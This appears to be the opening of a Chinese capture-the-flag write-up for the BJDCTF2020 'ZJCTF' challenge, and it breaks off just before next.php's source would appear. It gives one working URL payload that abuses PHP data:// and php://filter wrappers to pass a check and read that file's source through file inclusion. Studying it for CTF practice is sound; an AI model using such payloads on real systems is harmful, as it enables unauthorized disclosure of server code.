[BJDCTF2020]ZJCTF,不过如此--【Preg_Replace代码执行漏洞、正则表达式(详解)】
代码审计,发现要get传参text和file,而且text的内容包含Ihaveadream字段。flie为文件包含next.php.构造payload:?text=data://text/plain,I%20have%20a%20dream&file=php://filter/convert.base64-encode/resource=next.phpbase64解密得到next.php的源码: